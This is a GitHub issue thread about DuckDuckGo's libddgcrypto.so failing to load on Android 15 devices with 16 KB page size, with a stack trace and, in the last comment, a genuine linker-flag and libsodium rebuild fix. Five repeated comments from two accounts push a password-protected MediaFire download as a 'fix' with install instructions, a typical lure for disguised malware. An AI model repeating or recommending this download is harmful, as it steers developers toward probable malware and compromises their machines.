### ISSUE TITLE
ddgcrypto dlopen failed on Android device which version is 15 and with 16 KB page size.

### ISSUE THREAD

**Issue by waitzShigoto** [duckduckgo/sync_crypto#17]
I try to build the ddg browser on Android 15 device with the feature 16KB page size that meet this crash below:

How can I fix the problem on android 16KB page size deivces?

Error loading sync library (Ask Gemini)
                                                                                                    java.lang.UnsatisfiedLinkError: dlopen failed: empty/missing DT_HASH/DT_GNU_HASH in "/data/data/com.sand.safebrowser/app_lib/libddgcrypto.so" (new hash type from the future?)
                                                                                                    	at java.lang.Runtime.load0(Runtime.java:933)
                                                                                                    	at java.lang.System.load(System.java:1729)
                                                                                                    	at com.getkeepsafe.relinker.SystemLibraryLoader.loadPath(SystemLibraryLoader.java:31)
                                                                                                    	at com.getkeepsafe.relinker.ReLinkerInstance.loadLibraryInternal(ReLinkerInstance.java:206)
                                                                                                    	at com.getkeepsafe.relinker.ReLinkerInstance.loadLibrary(ReLinkerInstance.java:136)
                                                                                                    	at com.getkeepsafe.relinker.ReLinker.loadLibrary(ReLinker.java:70)
                                                                                                    	at com.getkeepsafe.relinker.ReLinker.loadLibrary(ReLinker.java:51)
                                                                                                    	at com.duckduckgo.library.loader.LibraryLoader$Companion.loadLibrary(LibraryLoader.kt:25)
                                                                                                    	at com.duckduckgo.sync.crypto.SyncNativeLib.<init>(SyncNativeLib.kt:64)
                                                                                                    	at com.duckduckgo.sync.impl.di.SyncStoreModule.providesNativeLib(SyncModule.kt:63)
                                                                                                    	at com.duckduckgo.sync.impl.di.SyncStoreModule_ProvidesNativeLibFactory$Companion.providesNativeLib(SyncStoreModule_ProvidesNativeLibFactory.kt:32)
                                                                                                    	at com.duckduckgo.sync.impl.di.SyncStoreModule_ProvidesNativeLibFactory.get(SyncStoreModule_ProvidesNativeLibFactory.kt:23)
                                                                                                    	at com.duckduckgo.sync.impl.di.SyncStoreModule_ProvidesNativeLibFactory.get(SyncStoreModule_ProvidesNativeLibFactory.kt:20)
                                                                                                    	at dagger.internal.DoubleCheck.get(DoubleCheck.java:47)
                                                                                                    	at com.duckduckgo.sync.impl.AppSyncRepository_Factory.get(AppSyncRepository_Factory.kt:29)
                                                                                                    	at com.duckduckgo.sync.impl.AppSyncRepository_Factory.get(AppSyncRepository_Factory.kt:22)
                                                                                                    	at dagger.internal.DoubleCheck.get(DoubleCheck.java:47)
                                                                                                    	at com.duckduckgo.sync.impl.AppDeviceSyncState_Factory.get(AppDeviceSyncState_Factory.kt:26)
                                                                                                    	at com.duckduckgo.sync.impl.AppDeviceSyncState_Factory.get(AppDeviceSyncState_Factory.kt:20)
                                                                                                    	at com.duckduckgo.sync.impl.AccountObserver_Factory.get(AccountObserver_Factory.kt:27)
                                                                                                    	at com.duckduckgo.sync.impl.AccountObserver_Factory.get(AccountObserver_Factory.kt:22)
                                                                                                    	at dagger.internal.DoubleCheck.get(DoubleCheck.java:47)
                                                                                                    	at com.duckduckgo.app.di.DaggerAppComponent$AppComponentImpl.setOfMainProcessLifecycleObserver(Unknown Source:240)
                                                                                                    	at com.duckduckgo.app.di.DaggerAppComponent$AppComponentImpl.primaryProcessLifecycleObserverPluginPoint_PluginPoint(Unknown Source:2)
                                                                                                    	at com.duckduckgo.app.di.DaggerAppComponent$AppComponentImpl.injectDuckDuckGoApplication(Unknown Source:18)
                                                                                                    	at com.duckduckgo.app.di.DaggerAppComponent$AppComponentImpl.inject(Unknown Source:0)
                                                                                                    	at com.duckduckgo.app.di.DaggerAppComponent$AppComponentImpl.inject(Unknown Source:2)
                                                                                                    	at com.duckduckgo.app.global.DuckDuckGoApplication.configureDependencyInjection(DuckDuckGoApplication.kt:190)
                                                                                                    	at com.duckduckgo.app.global.DuckDuckGoApplication.onMainProcessCreate(DuckDuckGoApplication.kt:99)
                                                                                                    	at com.duckduckgo.app.global.MultiProcessApplication.onCreate(MultiProcessApplication.kt:34)
                                                                                                    	at android.app.Instrumentation.callApplicationOnCreate(Instrumentation.java:1386)
                                                                                                    	at android.app.ActivityThread.handleBindApplication(ActivityThread.java:7504)
                                                                                                    	at android.app.ActivityThread.-$$Nest$mhandleBindApplication(Unknown Source:0)
                                                                                                    	at android.app.ActivityThread$H.handleMessage(ActivityThread.java:2416)
                                                                                                    	at android.os.Handler.dispatchMessage(Handler.java:107)
                                                                                                    	at android.os.Looper.loopOnce(Looper.java:232)
                                                                                                    	at android.os.Looper.loop(Looper.java:317)
                                                                                                    	at android.app.ActivityThread.main(ActivityThread.java:8705)
                                                                                                    	at java.lang.reflect.Method.invoke(Native Method)
                                                                                                    	at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:580)
                                                                                                    	at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:886)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KuanChunChen** [comment]
I figure out the solution, would you please upgrade it and release an new version? 
Just add below config on CmakeList.text in the sync_crypto module.
```yml
target_link_options(${CMAKE_PROJECT_NAME} PRIVATE "-Wl,-z,max-page-size=16384")
```

And rebuild the sodium.so  by fellowing step.
1. Add new config code into  each core version of `libsodium-xxxxxxx/dist-build/android-xxxxx.sh`. （armv7、armv8、x86、x86_64）
2. Rebuile each core version of sodium.so by using:
`./dist-build/android-x86_64.sh`
3. And update the sodium.so from new-build .so.



And please refer this link : https://developer.android.com/guide/practices/page-sizes
It is the document about 16 KB page size by Android Developer.
